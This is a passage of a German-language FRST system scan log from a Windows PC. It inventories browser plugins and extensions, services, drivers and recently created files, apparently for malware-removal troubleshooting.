BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-29] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF SearchEngineOrder.3: Bing
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-04-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-04-26] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-2630849102-760198568-3561441068-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Harun\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [nicht gefunden]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]

Chrome:
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR StartupUrls: Default -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-08]
CHR Extension: (Adblock für Youtube™) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2016-03-05]
CHR Extension: (Google-Suche) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Google Docs Offline) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-15]
CHR Extension: (Sniper Team Game Collection) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-02-07]
CHR Extension: (Top Eleven) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2015-07-29]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Google Mail) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2016-04-03] (Advanced Micro Devices) [Datei ist nicht signiert]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S4 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
S4 Origin Client Service; A:\Origin\OriginClientService.exe [2007048 2015-08-01] (Electronic Arts)
S4 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-04-05] (Plays.tv, LLC)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2015-08-01] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76152 2015-08-02] ()
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4584208 2016-03-29] (AVG Technologies CZ, s.r.o.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [111120 2016-03-01] (Advanced Micro Devices)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-04-28] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
S3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [194320 2016-04-12] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-03-29] (AVG Netherlands B.V.)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [36904 2016-04-23] (Wellbia.com Co., Ltd.)
U3 idsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-26 22:19 - 2016-04-26 22:19 - 00000000 ____D C:\Users\Harun\.tooling
2016-04-26 21:34 - 2016-04-26 21:34 - 04203840 _____ C:\Users\Harun\Downloads\npp.6.9.1.Installer.exe
2016-04-26 21:34 - 2016-04-26 21:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
2016-04-26 21:34 - 2016-04-26 21:34 - 00000000 ____D C:\Program Files (x86)\Notepad++
2016-04-26 21:27 - 2016-04-26 21:32 - 00000000 ____D C:\Users\Harun\Desktop\Localhost
2016-04-26 21:06 - 2016-04-27 15:55 - 00000000 ____D C:\Users\Harun\workspace
2016-04-26 21:06 - 2016-04-27 15:55 - 00000000 ____D C:\Users\Harun\AppData\Local\Eclipse
2016-04-26 21:05 - 2016-04-26 21:05 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Eclipse
2016-04-26 21:03 - 2016-04-27 15:55 - 00000000 ____D C:\Users\Harun\.p2
2016-04-26 21:03 - 2016-04-26 21:18 - 00000000 ____D C:\Users\Harun\.eclipse
2016-04-26 21:03 - 2016-04-26 21:03 - 00000000 ____D C:\Users\Harun\eclipse
2016-04-26 21:02 - 2016-04-26 21:03 - 00000000 ____D C:\Users\Harun\.oracle_jre_usage
2016-04-26 21:02 - 2016-04-26 21:02 - 00110144 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge-64.dll
2016-04-26 21:02 - 2016-04-26 21:02 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sun
2016-04-26 21:01 - 2016-04-26 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2016-04-26 21:01 - 2016-04-26 21:02 - 00000000 ____D C:\Program Files\Java
2016-04-26 21:01 - 2016-04-26 21:01 - 00000000 ____D C:\Users\Harun\AppData\LocalLow\Oracle
2016-04-26 21:00 - 2016-04-26 21:01 - 196518456 _____ (Oracle Corporation) C:\Users\Harun\Downloads\jdk-8u91-windows-x64.exe
2016-04-26 20:58 - 2016-04-26 21:02 - 46881880 _____ C:\Users\Harun\Downloads\eclipse-inst-win64.exe
2016-04-26 20:54 - 2016-04-26 22:02 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-04-26 20:54 - 2016-04-26 20:54 - 00001119 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-04-26 20:53 - 2016-04-26 20:54 - 09786224 _____ (TeamViewer GmbH) C:\Users\Harun\Downloads\TeamViewer_Setup_de-jfa.exe
2016-04-26 17:17 - 2016-04-26 17:17 - 00000279 _____ C:\Users\Harun\Downloads\Search.txt
2016-04-26 17:14 - 2016-04-26 17:14 - 00000059 _____ C:\Users\Harun\Downloads\Fixlist.txt
2016-04-25 21:49 - 2016-04-25 21:49 - 00227454 _____ C:\Users\Harun\Documents\Faruk's Lebenslauf 2.pdf
2016-04-25 21:41 - 2016-04-25 21:41 - 00320317 _____ C:\Users\Harun\Documents\Lebenslauf1.pdf
2016-04-25 21:39 - 2016-04-25 21:40 - 00321616 ____T C:\Users\Harun\Documents\Lebenslauf.pdf
2016-04-25 14:08 - 2016-04-25 21:50 - 00000000 ____D C:\Users\Harun\Desktop\NVU (Faruk)
2016-04-25 13:36 - 2016-04-02 06:13 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-04-25 13:36 - 2016-04-02 05:19 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-04-25 13:36 - 2016-03-29 12:20 - 07474016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-04-25 13:36 - 2016-03-29 09:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-04-25 13:36 - 2016-03-29 09:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-04-25 13:36 - 2016-03-29 09:32 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-04-25 13:36 - 2016-03-29 09:15 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-25 13:36 - 2016-03-29 09:12 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-04-25 13:36 - 2016-03-29 09:12 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-04-25 13:36 - 2016-03-29 08:42 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-25 13:36 - 2016-03-29 08:37 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-25 13:36 - 2016-03-29 08:32 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-04-25 13:36 - 2016-03-29 08:31 - 02275328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-04-25 13:36 - 2016-03-29 08:31 - 01946112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-04-25 13:36 - 2016-03-29 08:26 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-04-25 13:36 - 2016-03-29 08:05 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-04-25 13:36 - 2016-03-29 08:05 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-04-25 13:36 - 2016-03-29 08:05 - 01388032 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-25 13:36 - 2016-03-29 08:02 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-04-25 13:36 - 2016-03-29 08:01 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-04-25 13:36 - 2016-03-29 07:56 - 16985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-04-25 13:36 - 2016-03-29 07:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-04-25 13:36 - 2016-03-29 07:51 - 22378496 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-25 13:36 - 2016-03-29 07:51 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-04-25 13:36 - 2016-03-29 07:41 - 24602112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-25 13:36 - 2016-03-29 07:41 - 12125184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-25 13:36 - 2016-03-29 07:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-25 13:36 - 2016-03-29 07:38 - 18673664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-25 13:36 - 2016-03-29 07:37 - 19340800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-25 13:36 - 2016-03-29 07:27 - 07836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-25 13:36 - 2016-03-29 07:27 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-25 13:36 - 2016-02-24 11:48 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-04-25 13:36 - 2016-02-24 11:47 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-04-25 13:36 - 2016-02-24 11:40 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-04-25 13:36 - 2016-02-24 10:46 - 06607080 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-04-25 13:36 - 2016-02-24 10:11 - 01997152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-04-25 13:36 - 2016-02-24 10:06 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-04-25 13:36 - 2016-02-24 07:03 - 14252544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-04-25 13:36 - 2016-02-23 13:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-04-25 13:36 - 2016-02-23 12:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-04-25 13:36 - 2016-02-23 12:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-04-25 13:36 - 2016-02-23 12:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-04-25 13:36 - 2016-02-23 12:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-04-25 13:36 - 2016-02-23 12:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-25 13:36 - 2016-02-23 11:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-04-25 13:36 - 2016-02-23 11:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-04-25 13:36 - 2016-02-23 10:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-04-25 13:36 - 2016-02-23 09:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-04-25 13:36 - 2016-02-23 08:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-04-25 13:36 - 2016-02-23 08:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-04-25 13:35 - 2016-04-02 06:10 - 00730344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-25 13:35 - 2016-04-02 05:29 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-04-25 13:35 - 2016-04-02 05:26 - 00630272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-04-25 13:35 - 2016-04-02 05:21 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-04-25 13:35 - 2016-04-02 05:18 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-25 13:35 - 2016-04-02 05:15 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-25 13:35 - 2016-04-02 05:14 - 03994624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-04-25 13:35 - 2016-04-02 05:09 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-25 13:35 - 2016-04-02 05:07 - 03575296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-04-25 13:35 - 2016-04-02 05:07 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-25 13:35 - 2016-04-02 05:00 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-25 13:35 - 2016-03-29 12:22 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-25 13:35 - 2016-03-29 12:22 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-25 13:35 - 2016-03-29 12:20 - 02656952 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-25 13:35 - 2016-03-29 12:20 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-25 13:35 - 2016-03-29 12:20 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-25 13:35 - 2016-03-29 12:18 - 02152280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-04-25 13:35 - 2016-03-29 12:11 - 00686976 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-04-25 13:35 - 2016-03-29 12:05 - 01152864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-04-25 13:35 - 2016-03-29 11:56 - 01297752 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-04-25 13:35 - 2016-03-29 11:37 - 01862008 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-25 13:35 - 2016-03-29 11:28 - 00696664 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-04-25 13:35 - 2016-03-29 11:28 - 00535080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-04-25 13:35 - 2016-03-29 11:25 - 00258912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufx01000.sys
2016-04-25 13:35 - 2016-03-29 11:19 - 00296488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2016-04-25 13:35 - 2016-03-29 11:17 - 00300104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-04-25 13:35 - 2016-03-29 11:13 - 00986976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-04-25 13:35 - 2016-03-29 11:11 - 00605440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-25 13:35 - 2016-03-29 11:08 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-04-25 13:35 - 2016-03-29 11:08 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-04-25 13:35 - 2016-03-29 10:44 - 00502104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-04-25 13:35 - 2016-03-29 10:41 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-25 13:35 - 2016-03-29 10:32 - 00253088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-04-25 13:35 - 2016-03-29 10:26 - 02403680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-04-25 13:35 - 2016-03-29 10:26 - 01089888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-25 13:35 - 2016-03-29 10:24 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-04-25 13:35 - 2016-03-29 10:21 - 00378208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2016-04-25 13:35 - 2016-03-29 10:07 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2016-04-25 13:35 - 2016-03-29 10:01 - 00541304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-25 13:35 - 2016-03-29 09:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-04-25 13:35 - 2016-03-29 09:57 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-04-25 13:35 - 2016-03-29 09:46 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-04-25 13:35 - 2016-03-29 09:42 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-04-25 13:35 - 2016-03-29 09:39 - 00550912 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-04-25 13:35 - 2016-03-29 09:38 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-04-25 13:35 - 2016-03-29 09:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-04-25 13:35 - 2016-03-29 09:36 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-04-25 13:35 - 2016-03-29 09:34 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-04-25 13:35 - 2016-03-29 09:30 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-25 13:35 - 2016-03-29 09:30 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-25 13:35 - 2016-03-29 09:28 - 00460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-04-25 13:35 - 2016-03-29 09:27 - 00339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-04-25 13:35 - 2016-03-29 09:26 - 00169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2016-04-25 13:35 - 2016-03-29 09:23 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-04-25 13:35 - 2016-03-29 09:23 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-04-25 13:35 - 2016-03-29 09:22 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-04-25 13:35 - 2016-03-29 09:20 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-04-25 13:35 - 2016-03-29 09:20 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-04-25 13:35 - 2016-03-29 09:19 - 00556032 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-04-25 13:35 - 2016-03-29 09:17 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-04-25 13:35 - 2016-03-29 09:17 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-04-25 13:35 - 2016-03-29 09:16 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-04-25 13:35 - 2016-03-29 09:15 - 01714688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
